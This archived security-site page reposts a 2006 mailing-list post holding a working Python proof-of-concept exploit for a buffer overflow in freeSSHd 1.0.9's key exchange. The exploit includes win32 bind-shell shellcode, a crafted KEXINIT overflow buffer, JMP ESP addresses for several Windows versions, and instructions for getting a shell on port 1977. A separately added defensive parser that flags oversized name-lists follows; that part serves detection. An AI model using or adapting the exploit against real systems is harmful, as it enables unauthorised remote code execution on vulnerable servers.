POC exploit for freeSSHd version 1.0.9

2006.05.17
Credit: Tauqeer Ahmad
Risk: High
Local: Yes
Remote: Yes
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Also available in Metasploit framework: http://metasploit.com/projects/Framework/modules/exploits/freesshd_key_exchange.pm

david maciejak
> Hi all,
>
> Attachment is the POC exploit for freeSSHd version
> 1.0.9
>
> Advisories:
> http://www.securityfocus.com/bid/17958
> http://www.frsirt.com/english/advisories/2006/1786
>
> This was coded for educational purposes.
>
> Regards,
>
> Tauqeer Ahmad
>
> #!/usr/bin/env python
>
> """
> Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0
> ahmadtauqeer[at]yahoo.com
> Disclaimer: This proof of concept exploit is for educational purposes only.
> Please do not use it against any system without prior permission.
> You are responsible for yourself for what you do with this code.
>
> Greetings: All the Pakistani White Hats including me ;)
> Flames: To all the skript kiddies out there. Man, grow up!
> Code tested against freeSSHd version 1.0.9
> If you didn't get a shell at first try, try a few times and you will get lucky
>
> Advisories:
> http://www.securityfocus.com/bid/17958
> http://www.frsirt.com/english/advisories/2006/1786
>
> """
> import socket
> import getopt
> import sys
>
> host = "192.168.0.2"
> port = 0
> eip = ""
>
> #/* win32_bind - EXITFUNC=thread LPORT=1977 Size=317 Encoder=None http://metasploit.com */
> shellcode = (
>     "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
>     "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
>     "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
>     "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
>     "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
>     "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
>     "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
>     "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
>     "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
>     "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
>     "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
>     "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
>     "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
>     "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
>     "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
>     "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
>     "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
>     "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
>     "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
>     "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0"
> )
>
>
> def exploit():
>
>     # SSH version banner "SSH-1.99-OpenSSH_3.4\n", then the start of an
>     # SSH_MSG_KEXINIT packet: packet_length, padding_length, message type
>     # 0x14, a zeroed 16-byte cookie and a 4-byte name-list length (0x07de)
>     buff = ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48"
>             "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00"
>             "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde")
>
>     buff = buff + "A" * 1055
>     buff = buff + eip
>     buff = buff + "yyyy"
>     buff = buff + "\x90" * 4
>     buff = buff + shellcode
>     buff = buff + "B" * 19021 + "\r\n"
>
>     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>     sock.connect((host, port))
>     print "+ Received reply from server: " + sock.recv(1000)
>
>     sock.send(buff)
>     print "+ SSHD exploited. Now telnet to port 1977 to get shell "
>     print "+ if you didn't get a shell on the first try, try again until you succeed"
>
>     sock.close()
>     sock = None
>
>
> def usage():
>     print "#############################################"
>     print "#          CODED BY TAUQEER AHMAD           #"
>     print "#                Scientist                  #"
>     print "#############################################"
>     print "\n"
>     print "Usage: %s -h <hostip> -p <port> -o <OS>" % sys.argv[0]
>     print "Following OS supported\n"
>     print "1 Window XP SP1"
>     print "2 Window XP SP2"
>     print "3 Windows 2000 Advanced Server"
>
>
> if __name__ == '__main__':
>
>     if len(sys.argv) < 7:
>         usage()
>         sys.exit()
>
>     try:
>         options = getopt.getopt(sys.argv[1:], 'h:p:o:')[0]
>     except getopt.GetoptError as err:
>         print err
>         usage()
>         sys.exit()
>
>     for option, value in options:
>         if option == '-h':
>             host = value
>         if option == '-p':
>             port = int(value)
>         if option == '-o':
>             if value == '1':
>                 eip = "\xFC\x18\xD7\x77"  # 77D718FC JMP ESP IN USER32.dll (Windows Xp professional SP1)
>             elif value == '2':
>                 eip = "\x0A\xAF\xD8\x77"  # 77D8AF0A JMP ESP IN USER32.DLL (Windows Xp professional SP2)
>             elif value == '3':
>                 eip = "\x4D\x3F\xE3\x77"  # 77E33F4D JMP ESP IN USER32.DLL (windows 2000 advanced server)
>             else:
>                 usage()
>                 sys.exit()
>
>     exploit()
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
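A defender-side counterpart, added here as an example and not part of the mailing-list post or the PoC: a parser that walks an SSH_MSG_KEXINIT packet the way the PoC lays one out (packet_length, padding_length, message type 0x14, 16-byte cookie, then the name-lists) and flags a name-list whose declared length is out of bounds, which is the field the PoC inflates to 0x07de bytes. The 1024-byte bound and both sample packets are my assumptions; the samples are constructed with plain filler and carry no payload.

```python
import struct

SSH_MSG_KEXINIT = 20
MAX_NAMELIST_LEN = 1024   # assumed sane bound for one name-list; not a protocol limit
NAMELIST_COUNT = 10       # kex, hostkey, enc x2, mac x2, comp x2, lang x2
# RFC 4251 name-lists are comma-separated printable US-ASCII names
ALLOWED = set(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-@.,+=_")


def build_kexinit(names, padding_len=4):
    """Constructed helper: wrap ten name-lists into one SSH binary packet."""
    payload = bytes([SSH_MSG_KEXINIT]) + b"\x00" * 16      # msg type + zero cookie
    for n in names:
        payload += struct.pack(">I", len(n)) + n
    payload += b"\x00" + b"\x00\x00\x00\x00"                # first_kex_packet_follows, reserved
    body = bytes([padding_len]) + payload + b"\x00" * padding_len
    return struct.pack(">I", len(body)) + body


def check_kexinit(packet):
    """Return ('ok' | 'suspicious', reason) for one SSH binary packet."""
    if len(packet) < 6:
        return "suspicious", "truncated packet header"
    packet_len, padding_len = struct.unpack(">IB", packet[:5])
    if packet_len + 4 > len(packet):
        return "suspicious", "packet_length %d exceeds bytes on the wire" % packet_len
    payload = packet[5:4 + packet_len - padding_len]
    if not payload or payload[0] != SSH_MSG_KEXINIT:
        return "ok", "not a KEXINIT"
    pos = 17                                                # skip msg byte and cookie
    for i in range(NAMELIST_COUNT):
        if pos + 4 > len(payload):
            return "suspicious", "name-list %d truncated" % i
        n = struct.unpack(">I", payload[pos:pos + 4])[0]
        if n > MAX_NAMELIST_LEN:
            return "suspicious", "name-list %d claims %d bytes" % (i, n)
        field = payload[pos + 4:pos + 4 + n]
        if len(field) < n:
            return "suspicious", "name-list %d runs past the packet" % i
        if any(c not in ALLOWED for c in field):
            return "suspicious", "name-list %d has non-name bytes" % i
        pos += 4 + n
    return "ok", "KEXINIT within bounds"


# Constructed samples: a normal client KEXINIT, and one whose kex_algorithms
# list is declared as 2014 bytes (0x07de, the length the PoC sends) of filler.
BENIGN_LISTS = [b"diffie-hellman-group14-sha1", b"ssh-rsa", b"aes128-ctr",
                b"aes128-ctr", b"hmac-sha1", b"hmac-sha1", b"none", b"none", b"", b""]
OVERSIZED_LISTS = [b"A" * 2014] + BENIGN_LISTS[1:]
```

Calling `check_kexinit(build_kexinit(OVERSIZED_LISTS))` returns the suspicious verdict with the offending list index and length, while the benign packet passes.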


Copyright 2017, cxsecurity.com